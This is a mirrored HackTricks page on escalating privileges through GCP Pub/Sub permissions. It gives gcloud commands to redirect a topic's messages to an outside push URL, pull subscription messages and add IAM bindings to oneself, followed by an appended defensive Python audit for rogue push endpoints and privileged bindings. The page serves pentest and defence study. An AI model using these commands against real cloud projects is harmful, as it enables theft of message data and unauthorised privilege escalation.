mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-12 07:40:49 -08:00
# GCP - Pubsub Privesc
{{#include ../../../banners/hacktricks-training.md}}
## PubSub
Get more information in:
{{#ref}} ../gcp-services/gcp-pub-sub.md {{#endref}}
### `pubsub.snapshots.create` (`pubsub.topics.attachSubscription`)

Snapshots of a topic contain the currently unACKed messages and every message published after them. You could create a snapshot of a topic to access all the messages without accessing the topic directly.

### `pubsub.snapshots.setIamPolicy`

Assign the previous permissions to yourself.

### `pubsub.subscriptions.create`

You can create a push subscription on a topic that will forward all received messages to the indicated URL:

```bash
gcloud pubsub subscriptions create <subscription_name> --topic <topic_name> --push-endpoint https://<URL_to_push_to>
```
### `pubsub.subscriptions.update`

Set your own URL as the push endpoint to steal the messages.

### `pubsub.subscriptions.consume`

Access messages using the subscription:

```bash
gcloud pubsub subscriptions pull <SUBSCRIPTION> \
    --limit=50 \
    --format="json" \
    --project=<PROJECTID>
```
### `pubsub.subscriptions.setIamPolicy`

Give yourself any of the previous permissions:

```bash
# Add Binding
gcloud pubsub subscriptions add-iam-policy-binding <SUBSCRIPTION_NAME> \
    --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
    --role="<ROLE_OR_CUSTOM_ROLE>" \
    --project="<PROJECT_ID>"

# Remove Binding
gcloud pubsub subscriptions remove-iam-policy-binding <SUBSCRIPTION_NAME> \
    --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
    --role="<ROLE_OR_CUSTOM_ROLE>" \
    --project="<PROJECT_ID>"

# Change Policy (process substitution feeds the JSON as the policy file)
gcloud pubsub subscriptions set-iam-policy <SUBSCRIPTION_NAME> \
    <(echo '{
      "bindings": [
        {
          "role": "<ROLE_OR_CUSTOM_ROLE>",
          "members": [
            "serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"
          ]
        }
      ]
    }') \
    --project=<PROJECT_ID>
```
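As an added defender-side example (not from the HackTricks page or the gcloud tooling), the Python audit below takes JSON in the shape of `gcloud pubsub subscriptions list --format=json` and `gcloud pubsub subscriptions get-iam-policy --format=json` and flags two things the sections above rely on: push subscriptions whose endpoint lies outside an allowed domain (the `subscriptions.create` / `subscriptions.update` abuse) and privileged role bindings held by members nobody expected (the `setIamPolicy` abuse). The sample data, the allowed domain and the privileged-role set are constructed assumptions for the demo.

```python
"""Audit Pub/Sub subscriptions for off-domain push endpoints and privileged bindings."""
import json
from urllib.parse import urlparse

# Constructed sample shaped like `gcloud pubsub subscriptions list --format=json`
# (only the fields used here); project, subscription and host names are made up.
SAMPLE_SUBSCRIPTIONS = json.loads("""[
 {"name": "projects/demo-project/subscriptions/orders-worker",
  "pushConfig": {"pushEndpoint": "https://orders.internal.example.com/push"}},
 {"name": "projects/demo-project/subscriptions/orders-mirror",
  "pushConfig": {"pushEndpoint": "https://collector.attacker-example.net/"}},
 {"name": "projects/demo-project/subscriptions/orders-pull", "pushConfig": {}}
]""")
# Constructed sample shaped like `gcloud pubsub subscriptions get-iam-policy --format=json`.
SAMPLE_POLICY = json.loads("""{"bindings": [
 {"role": "roles/pubsub.subscriber",
  "members": ["serviceAccount:orders-worker@demo-project.iam.gserviceaccount.com"]},
 {"role": "roles/pubsub.admin",
  "members": ["serviceAccount:ci-deployer@demo-project.iam.gserviceaccount.com"]}
]}""")
# Assumed policy: domains where push endpoints may live, and predefined roles that
# can change a subscription (update/create) or its IAM policy. Tune per project.
ALLOWED_PUSH_DOMAINS = {"internal.example.com"}
PRIVILEGED_ROLES = {"roles/owner", "roles/editor", "roles/pubsub.admin", "roles/pubsub.editor"}

def is_allowed_host(host, allowed_domains):
    """True if host equals an allowed domain or is a subdomain of one (label-aligned)."""
    return any(host == d or host.endswith("." + d) for d in allowed_domains)

def find_rogue_push_endpoints(subscriptions, allowed_domains):
    """(subscription name, endpoint) for every push endpoint outside allowed_domains."""
    rogue = []
    for sub in subscriptions:
        endpoint = sub.get("pushConfig", {}).get("pushEndpoint")
        if not endpoint:
            continue  # pull subscription: nothing is pushed to an external URL
        host = urlparse(endpoint).hostname or ""
        if not is_allowed_host(host, allowed_domains):
            rogue.append((sub["name"], endpoint))
    return rogue

def find_unexpected_privileged_members(policy, expected_members):
    """(role, member) for privileged roles held by anyone outside expected_members."""
    findings = []
    for binding in policy.get("bindings", []):
        if binding.get("role") in PRIVILEGED_ROLES:
            findings.extend((binding["role"], m) for m in binding.get("members", [])
                            if m not in expected_members)
    return findings
```

Run it against real output by replacing the two constructed samples with the parsed gcloud JSON; a non-empty result from either function is a finding worth an alert.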
{{#include ../../../banners/hacktricks-training.md}}